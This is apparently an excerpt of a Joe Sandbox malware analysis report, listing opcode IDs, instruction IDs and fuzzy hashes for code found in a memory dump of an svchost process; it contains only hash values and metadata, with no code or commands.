                                                      • Instruction Fuzzy Hash: F4510461B0EA864FE397BA78D8551B93FE6DF86220B0941FBD489C7193DC1C9C468362
                                                      Memory Dump Source
                                                      • Source File: 0000001A.00000002.2559768668.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_26_2_7ffb4ad30000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c2e46173e638f5e0822a822dc6441b911da9c1966be7b3122be5392858e438ba
                                                      • Instruction ID: a24d8ca7236abd5562068a78a4307374393376e3cd7d46d8d057cea14d559d5d
                                                      • Opcode Fuzzy Hash: c2e46173e638f5e0822a822dc6441b911da9c1966be7b3122be5392858e438ba
                                                      • Instruction Fuzzy Hash: 9921FB67E0E79B8FE741BFBCD8620E97B74EF86220B0842F7D485DA193DD1858068350
                                                      Memory Dump Source
                                                      • Source File: 0000001A.00000002.2559768668.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_26_2_7ffb4ad30000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 984cae828a16c1c812c9c48a1c1e44304bab6f830306d28d2606b8f35a7d1f6d
                                                      • Instruction ID: 031e687452d2457556d686dce8e9ec904d5b883c254a8443b536f867746c9bce
                                                      • Opcode Fuzzy Hash: 984cae828a16c1c812c9c48a1c1e44304bab6f830306d28d2606b8f35a7d1f6d
                                                      • Instruction Fuzzy Hash: 10A15566B0A66ADAD701BF7CE8451EC7BA4EF85335B1482F7C849CA187CD28644787E0
                                                      Memory Dump Source
                                                      • Source File: 0000001A.00000002.2559768668.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_26_2_7ffb4ad30000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b423d53dbaa03fcd72eec8dce6b41d54a30a56e72c6832c4548b2e70537b2b54
                                                      • Instruction ID: 28d049c326424adf41f2b126ea28884f2681766e45ffb23f0de1d5a75215d6eb
                                                      • Opcode Fuzzy Hash: b423d53dbaa03fcd72eec8dce6b41d54a30a56e72c6832c4548b2e70537b2b54
                                                      • Instruction Fuzzy Hash: DC912366B0AA2EDAD701BF7CF4051E87BA4EF85335B1482F7C449CA187CD28644787E0
                                                      Memory Dump Source
                                                      • Source File: 0000001A.00000002.2559768668.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_26_2_7ffb4ad30000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 211425fc17305469dc886443c17b758fae24b6b5d7a49fb8da76cee508c743db
                                                      • Instruction ID: a8eca53b7bb95c98341f3b529826da0cdc808aaf4a186e2030324b4b7b7e6478
                                                      • Opcode Fuzzy Hash: 211425fc17305469dc886443c17b758fae24b6b5d7a49fb8da76cee508c743db
                                                      • Instruction Fuzzy Hash: F3813566B09A2EDAD701BF7CF4052ED7BA4EF85325B1482F7D849CA187CD28644787E0
                                                      Memory Dump Source
                                                      • Source File: 0000001A.00000002.2559768668.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_26_2_7ffb4ad30000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6630af5a2c74608da739294435ebcdb44557b3c9ca15239aac51ab917f23aabe
                                                      • Instruction ID: f3a550d18680ee2e51abab7c78915259fb70ac47001dcef319e37ebe924c4c2b
                                                      • Opcode Fuzzy Hash: 6630af5a2c74608da739294435ebcdb44557b3c9ca15239aac51ab917f23aabe
                                                      • Instruction Fuzzy Hash: 1D814466B09A2ADAD701BF7CF4052ED7BA4EF85335B1482F7D849CA187CD28644787E0
                                                      Memory Dump Source
                                                      • Source File: 0000001A.00000002.2559768668.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_26_2_7ffb4ad30000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 93a26fa7796a2dfb07ba4fa5b9c0e387d79767828710a9e312a2f9918b8bae85
                                                      • Instruction ID: 20f6f4a909cf06bbf5d8a5f8c8e763de414bd40ce582746e4ca7afa58063a172
                                                      • Opcode Fuzzy Hash: 93a26fa7796a2dfb07ba4fa5b9c0e387d79767828710a9e312a2f9918b8bae85
                                                      • Instruction Fuzzy Hash: 5E716666B0AA2EDAD701BF7CE4052EC7BA4EF85325B1482F6D449D7187CD28A447C7E0
                                                      Memory Dump Source
                                                      • Source File: 0000001A.00000002.2559768668.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_26_2_7ffb4ad30000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 00170f9dc2704fa979f0a0d1e12f551ad457a26e5ef7ccd4c9ddbd0ed82fd195
                                                      • Instruction ID: 31bf115934f8957c9199b8d0c889e758a1b860970a7d1ed4601c399cd8f3e255
                                                      • Opcode Fuzzy Hash: 00170f9dc2704fa979f0a0d1e12f551ad457a26e5ef7ccd4c9ddbd0ed82fd195
                                                      • Instruction Fuzzy Hash: E931D361B1DA480FE789FB3C945A379A6C6EB98315F1402FEE44EC3293DD289C428345
                                                      Memory Dump Source
                                                      • Source File: 0000001A.00000002.2559768668.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_26_2_7ffb4ad30000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: fd90a5e10fb1264608242e6a8cb47c4d492fb05fb9e21d9ec28b19b4dd492103
                                                      • Instruction ID: da63c2760dcf6d934bab0c861511e9abe13f28c5d98e1fed9a16499a9ad077f0
                                                      • Opcode Fuzzy Hash: fd90a5e10fb1264608242e6a8cb47c4d492fb05fb9e21d9ec28b19b4dd492103
                                                      • Instruction Fuzzy Hash: 4231D391B19A099BE745BBBC981A3BD76D6EF98700F1402F6E40DD3582DD28AD018791
                                                      Memory Dump Source
                                                      • Source File: 0000001A.00000002.2559768668.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_26_2_7ffb4ad30000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 15e9149fa92c810c6054066aa31aa1f5d6dd6e48840026a64ab45205b7d5a452
                                                      • Instruction ID: 02c258fb179e8375762b4e7f1c98df597ff99d73cf9ff48bb82d409452a4bb29
                                                      • Opcode Fuzzy Hash: 15e9149fa92c810c6054066aa31aa1f5d6dd6e48840026a64ab45205b7d5a452
                                                      • Instruction Fuzzy Hash: 5641B270A1DA4D8FEB85FF78C4652EDBBA2FF98300F6445B5D009D328ACD38A9458750
                                                      Memory Dump Source
                                                      • Source File: 0000001A.00000002.2559768668.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_26_2_7ffb4ad30000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9a274d77b7cb5051bfcab0f7c986e25a2088fa683dfccd4748fa19676472726c
                                                      • Instruction ID: 382d20db2c23300df048e7ecb3555e5bda1ff2bd028e36a26cbd5d942a985ebf
                                                      • Opcode Fuzzy Hash: 9a274d77b7cb5051bfcab0f7c986e25a2088fa683dfccd4748fa19676472726c
                                                      • Instruction Fuzzy Hash: 1F31A16060AB8DDFD382FF38C4A81E97FA1EF94204BA081E5D849D738BCD3C99418761
                                                      Memory Dump Source
                                                      • Source File: 0000001A.00000002.2559768668.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_26_2_7ffb4ad30000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7476d388782daa06014ea2295b9e93900507d099afc6cc1312d5f3c3bfd2d6d0
                                                      • Instruction ID: 74778e87d2bbcdd85c0e4541efbc7ddb565a4a406bb5bc7eb5988e8271eca887
                                                      • Opcode Fuzzy Hash: 7476d388782daa06014ea2295b9e93900507d099afc6cc1312d5f3c3bfd2d6d0
                                                      • Instruction Fuzzy Hash: D3218260609A8D9FD395FB38C4A85E97F71AF94204BA085E5D849C338ECD3C9A518751
                                                      Memory Dump Source
                                                      • Source File: 0000001A.00000002.2559768668.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_26_2_7ffb4ad30000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c09e513bbb3264d1756167805cfcf81d5eb29fb2beda694d76c70f11b2ab4cfd
                                                      • Instruction ID: b0cdbc1ee638c624f314034fc4a8b932b880786e5cb3777ca73b861d91b78a41
                                                      • Opcode Fuzzy Hash: c09e513bbb3264d1756167805cfcf81d5eb29fb2beda694d76c70f11b2ab4cfd
                                                      • Instruction Fuzzy Hash: 51014959E0EBC54FE786BF388D554357FE0DFA1240B1804FAE8C8CA197DC08A9818342